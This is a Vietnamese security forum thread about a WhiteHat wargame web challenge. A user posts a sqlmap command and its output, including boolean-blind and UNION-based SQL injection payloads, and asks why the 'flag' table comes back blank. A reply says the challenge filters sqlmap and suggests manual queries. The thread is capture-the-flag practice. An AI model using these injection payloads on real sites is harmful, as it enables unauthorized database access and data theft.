Dùng sqlmap không hiện flag

Thảo luận trong 'Hỏi đáp' bắt đầu bởi du0n9, 02/06/18, 09:06 AM.

 1. du0n9

  du0n9 Active Member

  Tham gia: 28/01/18, 12:01 PM
  Bài viết: 27
  Đã được thích: 8
  Điểm thành tích:
  3
  Bài web03 của whitehat wargame cần khai thác sql injection để lấy flag trong bảng flag của database petworld nhưng mình dùng lệnh:
  Mã:
  sqlmap -u http://chall04-web01.wargame.whitehat.vn/detail.php?pet=pet01 -D petworld -T flag --dump 
  Thì thấy bảng này trống trơn:
  Mã:
  [*] starting at 10:06:00
  
  [10:06:00] [INFO] resuming back-end DBMS 'mysql'
  [10:06:00] [INFO] testing connection to the target URL
  sqlmap resumed the following injection point(s) from stored session:
  ---
  Parameter: pet (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pet=pet01' AND 9068=9068 AND 'NcjR'='NcjR
  
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: pet=-1354' UNION ALL SELECT NULL,CONCAT(0x716b787871,0x4565566d594e694d794a6b6844716f63496646654b4e677a686e7643556850736b61495a6f77444a,0x716b7a6271),NULL,NULL-- cmSH
  ---
  [10:06:00] [INFO] the back-end DBMS is MySQL
  web application technology: Apache
  back-end DBMS: MySQL 5
  [10:06:00] [INFO] fetching columns for table 'flag' in database 'petworld'
  [10:06:00] [INFO] used SQL query returns 1 entries
  [10:06:00] [INFO] fetching entries for table 'flag' in database 'petworld'
  [10:06:00] [INFO] used SQL query returns 1 entries
  [10:06:00] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
  [10:06:00] [INFO] fetching number of entries for table 'flag' in database 'petworld'
  [10:06:00] [INFO] resumed: 1
  [10:06:00] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
  [10:06:00] [INFO] retrieved:
  Database: petworld
  Table: flag
  [1 entry]
  +---------+
  | Flag  |
  +---------+
  | <blank> |
  +---------+
  
  Mình đã thử thêm --no-cast hoặc --hex nhưng cũng không có kết quả.
  Trong khi đó lấy dữ liệu từ bảng detail ở dùng database thì hoàn toàn bình thường.
  Có phải có cơ chế bảo vệ đặc biệt gì không, mong cao nhân chỉ giáo :)
   
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
 2. Baby_parrot

  Baby_parrot Member

  Tham gia: 17/04/18, 02:04 PM
  Bài viết: 32
  Đã được thích: 17
  Điểm thành tích:
  8
  Bài này tác giả có thêm filter bạn ơi nên sqlmap quét lỗi. Hướng bài này bạn nên thử các truy vấn bằng tay nhé
   
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  du0n9 and whf like this.